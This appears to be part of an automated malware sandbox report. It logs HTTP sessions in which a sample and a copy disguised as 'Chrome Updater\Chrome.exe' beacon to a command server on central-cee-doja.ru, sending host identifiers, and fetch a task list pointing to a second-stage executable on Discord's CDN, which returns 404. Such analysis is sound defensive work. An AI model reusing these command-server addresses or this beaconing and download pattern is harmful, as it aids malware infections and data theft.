                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=zIrCWcjvI81sQEHCdQMDQFqn_J38QYV.mQ6t3Nhy24E-1704353478-1-AenPckal6UI/pfiQCOmg1UNmJ/EwQWOh2k+1Tswo4yj07xQT5kffVQhCAM+bT9rUGbHsYGp1Lx1KMdGZ6X+Zja8=; path=/; expires=Thu, 04-Jan-24 08:01:18 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qu3gjmc3SrqzCZ88Fnm5rKhXFp3m9QN2UIKuIdo3UV78whL3jXu9qIxRDPz22E9AvaHlQvIqRXtUa2c2eII4nIjm1DUk7FD5oeHaexxhcn2%2FKNdW%2BP39p0lZ5Ajw0Xznkj0iow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=j4hS9IaLyJRuUOPUmHetyFQ0IMPSoSkvcThm0G2V4m0-1704353478021-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:18 UTC38INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?>
                                                                                    2024-01-04 07:31:18 UTC198INData Raw: 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: <Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    171192.168.2.649896104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:18 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:18 UTC572INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:18 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oucPJ7bRYrU6sOcf1ZIfKBqDBV6y8UBBO8ByLzadjJIT5xfaideQC1GAzwNaUGoyPR7HTPNxuPB2eYqE0gTIFo3Bx%2FlkgIfuHSP3MVQ6N5C88roSOxPBybQ3UnEhLaRD3GYbzJd7"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7f8c91f5980-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:18 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    172192.168.2.649897104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:18 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:19 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:19 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vg8S%2B6Is4xiFiCxhX%2FDEUtRVkcbaDTwVsuF3L0ag5CsQII1QqMQZE2uDD7rhSCoEKh4vhjuf8M8T2R2i2zAHzph0vBr5HU6GqFKDUkaE%2FnhL3Zugy3uYbltTVxVDDzLr0nTdh%2B%2B5"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7f8fa835a33-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:19 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    173192.168.2.649898104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:19 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:19 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:19 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=muPrP6TXLiV4qC5MDxp4lt3tCIqjVvtYqShbvwiKx9%2FZcXlVDOR4Aa0sbJ0B0EHEVW2M6hjU%2Fj%2BJCXHHr9CREXyFt1I9tBEmiLNSWPIZTmJ9MY3jmKRuh2XggSmSiunHrofUs8qY"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7fd1add7f9e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:19 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    174192.168.2.649899104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:19 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:19 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:19 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9ukS5exMhxKER2czhfFYg%2BGx6vMKZxYFgoaZu6pYzCgHBT%2BeLDd4xd6GUrkrosRJ8Mhg9QSpmqzBByeZLPEl27Y8GPorgAJQesFatpwFMzHJkBqDatueJQPW%2B4UZA%2FMpGIMNFdaa"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7fe8ec86fa1-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:19 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    175192.168.2.649900162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:19 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:19 UTC1345INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:19 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c80149333952-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 54
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:19 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=yipICzpclU_6i0QapmYtDOyyKMLyqaNtkTg14mxPxZ0-1704353479-1-ASj5JgATyKMKqNXkYmhtBpuSuOc5FDcfgZbyuGgd+YzaYR7mcVwrKlAAvhJTTahiC1O40093Xi1sZ7rX4joPjYQ=; path=/; expires=Thu, 04-Jan-24 08:01:19 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TxRtoYGytd%2FYxgwJdZBbxTD1W8kpjWply4wJJWIOLO2Gg%2FXk2ud5pe5Say%2F%2BBl57%2FKFBy%2BTHFqaMZ08U%2F78fLQHF9lfzXyhTVvIy%2F8vOBurA9fC5fEl3Ks2GDKyofvQFPCbi%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=U85nBfSiH._MoCLpX9JMz8yBgVugscYIg80IFTmdbMU-1704353479906-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:19 UTC24INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f
                                                                                    Data Ascii: <?xml version='1.0' enco
                                                                                    2024-01-04 07:31:19 UTC212INData Raw: 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    176192.168.2.649901162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:19 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:20 UTC1340INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:20 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c802df242d09-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 62
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:20 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=jTfx0.5_.XjfUG5rSP_bDMc202q95oytNowvtzxUSaE-1704353480-1-Ac6DMtuZTFpv5AzeerQJY98GKT+l8GfAqtfNXsWToo/sMtXwlVzuMFwwgaOFnb6tBGWRITedhBm1b26BUVbydtQ=; path=/; expires=Thu, 04-Jan-24 08:01:20 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rcY8nTctcUQNuRXoYCDCVVLZrkL9fi0ZS5x6ItBGd84umjTZAqcx6P7bJ4nDckCR5eGt7Q1ol2SOEDchaflfgzusJgweiJCW%2Bm65JlkfF0T1at16l6Nl2xu%2BU7raKGBChz%2Bo9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=K5SvHu42.wBG_WSQSVcthVDNpG38AbsdoPgSPMFtuxE-1704353480161-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:20 UTC29INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d
                                                                                    Data Ascii: <?xml version='1.0' encoding=
                                                                                    2024-01-04 07:31:20 UTC207INData Raw: 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 'UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    177192.168.2.649902104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:20 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:20 UTC584INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:20 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5sX4yGQpk9r3fckItBU5JW%2FInBhY5mzfIWBn3i%2BESlf7OSBaLcq1NZICaBmvwftUGh%2FQOsyInrKdPXe6kMwxzwNcsw3v3iRD0%2F5fRth9NU8AV47pPnGX%2Bvo%2Fd8rGISDbFAdOHkS%2F"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c804cdbf81e8-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:20 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    178192.168.2.649903104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:20 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:20 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:20 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iT0WPDs58NQGpGbaS%2FbYRzzuxs%2Fcabqd8bsbULfjOFuWLEHEr2wKpct4QyzFxbEiG8KwpldlhIVu7pwGdsT9OPwYzvPCTxXjhoAuef%2B7AYVVw0SFl4qijjfYtewh8RsHY1oFrs37"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8065b5d0821-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:20 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    179192.168.2.649904104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:20 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:21 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:21 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SvYgppUgKwpFYZZDUVRJP%2BtXjIx4fhWUyq6jxyT8IwXgs3z4pSv66GD4QyK3wEOXVYKNm%2BlAWE%2B%2F8244T0AGhcYqfZKORPcS0ycfFVvg4MTiOQJ6fWLQxxTBmS0pJcfnNyB0WGxf"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c808698412c9-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:21 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    180192.168.2.649905104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:21 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:21 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:21 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Muzwt0%2FlMNVE306UU3DrR%2BoE1lFvUS7j%2FpOSbRyMOd%2FYi0cymyLUo9ovHCj%2BOkdluI2yg456b%2BjIHyP6rzm9Q00OrRoUT5TJGhqraobUAWAo2p2f6l6Bt4FzrdLATRnAiRAuC615"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c80aaf169c58-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:21 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    181192.168.2.649906162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:23 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:23 UTC1344INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:23 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c817994e81c1-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 45
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:23 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=z28m.UIOXImt0fLufyHgvQsthJ3PHAXGDF5Kwv69.G8-1704353483-1-AXzNLUsqug2eMakHHBR7Pks96fVaPLHjDIBJv/+Jf8P45ncEhenZBHtBPozF6DfrFcUPQ9Nqu8HQt5skgjIhLAw=; path=/; expires=Thu, 04-Jan-24 08:01:23 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RPngW7j2hIyvGn%2FzlZPqZMMY%2BnVwv%2BKJGjjq4HaDN5uLgNXZmVdbkOpvNkHK%2BmW9GZflKnEF38ejB2YrL2J5ROeCY%2BXOcGgW9XRjT6VLEVAtkXR5OmVuoO7yqbJKv21G8H0i6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=hgovvdmJzjrMsMLFnHJJvvzxbTpc93stuET.ez9auV8-1704353483487-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:23 UTC25INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64
                                                                                    Data Ascii: <?xml version='1.0' encod
